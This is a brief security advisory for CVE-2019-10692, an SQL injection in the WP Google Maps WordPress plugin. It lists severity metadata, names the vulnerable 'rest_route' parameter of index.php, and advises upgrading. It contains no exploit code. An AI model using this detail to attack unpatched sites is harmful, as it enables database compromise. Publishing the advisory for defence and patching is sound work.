Vendor: WP Google Maps
By: Jonatas Fil
CVSS: 9.8 (CRITICAL)
CWE: 89 (SQL Injection)
Product Name: WP Google Maps
Affected Version From: < 7.11.18
Affected Version To:
Patch Exists: YES
Related CVE: CVE-2019-10692
CPE: 2.3:a:wordpress:wp_google_maps:7.11.18
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2020
WordPress Rest Google Maps Plugin SQL Injection
A SQL injection vulnerability was discovered in the WordPress Rest Google Maps Plugin. It exists because user-supplied input in the 'rest_route' parameter of the 'index.php' script is insufficiently sanitized. An attacker can send a specially crafted HTTP request containing malicious SQL commands to the vulnerable script and execute arbitrary SQL commands on the underlying database.
Mitigation:
The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the plugin.